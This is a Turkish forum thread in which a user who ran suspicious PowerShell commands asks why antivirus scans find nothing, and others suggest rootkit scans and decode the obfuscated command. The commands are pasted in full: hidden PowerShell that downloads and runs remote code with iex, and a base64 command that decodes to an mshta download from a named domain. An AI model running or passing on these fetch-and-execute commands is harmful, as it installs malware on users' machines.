PowerShell'de çalıştırılan virüsü Malwarebytes ve Defender bulamıyor

firtina44

Gelişen
Katılım
8 Ocak 2025
Mesajlar
11
Beğeniler
0
Dün dalgınlıkla PowerShell'de iki tane komut çalıştırdım virüs olduğunu kendime gelince anladım, komutları aşağı bırakıyorum. Olayı anladıktan hemen sonra Windows Defender Çevrimdışı tarama yaptım 11dk sürdü bir şey bulamadı, Malwarebytes ile 2-3kere tarama yaptım o da bulamadı. Fikirleriniz benim için önemli virüs temizlendiği için mi bulunamıyor yoksa kendini iyi mi gizliyor?

Komutlar:

Kod:
powershell.exe -W Hidden -command [imath]url = 'https mega01.b-cdn.net/meg.txt';[/imath]response = Invoke-WebRequest -Uri [imath]url -UseBasicParsing;[/imath]text = [imath]response.Content; iex[/imath]text

.run steamtools;powershell.exe -W Hidden -command [imath]url = 'https mega01.b-cdn.net/meg.txt';[/imath]response = Invoke-WebRequest -Uri [imath]url -UseBasicParsing;[/imath]text = [imath]response.Content; iex[/imath]text

Bir de bu var
powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgAwADgAIgA=
 
Malwarebytes ayarlarında Rootkit tarama özelliği var onu açıp tarayın bir de. İçin rahat etmez ise Kaspersky ile tarat bir de.
 
Son düzenleyen: Moderatör:
Sanki kapatmislar serveri. Sirf fantazisine Linux'dan gireyim dedim sonuc bu.
 
Sanki kapatmislar serveri. Sirf fantazisine Linux'dan gireyim dedim sonuc bu.
Eki Görüntüle 116290
Sorun olmaz mı yani hocam?

Sanki kapatmislar serveri. Sirf fantazisine Linux'dan gireyim dedim sonuc bu.
Eki Görüntüle 116290
powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgAwADgAIgA=

Bu kodun çözümlenmiş hali bu.
mshta https://clicktogo.click/downloads/tr08
İsterseniz bir de bu siteye bakın hocam.
 
Son düzenleyen: Moderatör:
Siz adam mi avlamaya calisiyorsunuz acaba?

Ve hayir bu da calismiyor eger DNSim engellemiyorsa.
 
Son düzenleyen: Moderatör:
Bu komutları ne diye çalıştırdın? Birisi mi kandırdı çalıştır diye?
 
İfadeler: 29
Bu siteyi kullanmak için çerezler gereklidir. Siteyi kullanmaya devam etmek için çerezleri kabul etmelisiniz. Daha Fazlasını Öğren.…